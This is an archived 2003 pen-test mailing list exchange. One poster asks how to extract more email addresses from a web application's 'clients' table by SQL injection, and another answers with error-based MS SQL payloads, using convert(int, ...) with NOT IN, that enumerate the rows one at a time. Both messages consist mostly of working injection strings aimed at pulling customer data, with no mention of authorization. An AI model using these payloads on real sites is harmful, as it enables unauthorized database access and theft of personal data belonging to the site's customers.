Re: SQL injection - get more values
From: Kevin Spett (kspett@spidynamics.com)
Date: 02/12/03
- Previous message: Milton.Keath@AlconLabs.com: "RE: Vulnebrability level definition"
- In reply to: Daniel Savi: "SQL injection - get more values"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Kevin Spett" <kspett@spidynamics.com> To: "Daniel Savi" <dss@brturbo.com>, <pen-test@securityfocus.com> Date: Wed, 12 Feb 2003 17:14:14 -0500
A similar situation is covered in my paper at
http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf
Basically, you should use the NOT IN to get the other values. In this case,
you'd start like this:
' %2b convert(int, (SELECT email FROM clients WHERE email NOT IN
('anon@isp.com'))) %2b '
And then the next one would be:
' %2b convert(int, (SELECT email FROM clients WHERE email NOT IN
('anon@isp.com', 'secondemail@isp.com'))) %2b '
And so on...
Kevin Spett
SPI Labs
http://www.spidynamics.com/
----- Original Message -----
From: "Daniel Savi" <dss@brturbo.com>
To: <pen-test@securityfocus.com>
Sent: Wednesday, February 12, 2003 12:48 PM
Subject: SQL injection - get more values
>
>
> Hi :)
>
> i'm trying to get some info from clients table and email field....
>
> i try this param into gubpage.asp?=...
> ') union select sum(email) from clients--
> and got error about all queries needed...so, i tryed to solve with
> ') union select sum(email),1,1,1.... from clients--
> until i get: operand type clash: text is incompatible with int
>
> i found this answer into this forum (thanks :)), was:
> ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '
>
> i got this:
> Syntax error converting the varchar value 'anon@isp.com' to a column of
> data type int
>
> Now, my problem: How can i get other e-mail from table knowing one valid
> value?
>
> i try this
> ' %2b convert(int, (SELECT email FROM clients WHERE email
> > 'anon@isp.com')) %2b '
> but no success
>
> i think i can use NOT iN, but not sure how to use with convert...
>
> Any tip are welcome!
>
> Thanks
>
> --------------------------------------------------------------------------
-- > This list is provided by the SecurityFocus Security Intelligence Alert (SIA) > Service. For more information on SecurityFocus' SIA service which > automatically alerts you to the latest security vulnerabilities please see: > https://alerts.securityfocus.com/ > > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
- Next message: Thaidn: "Re: SQL injection - get more values"
- Previous message: Milton.Keath@AlconLabs.com: "RE: Vulnebrability level definition"
- In reply to: Daniel Savi: "SQL injection - get more values"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
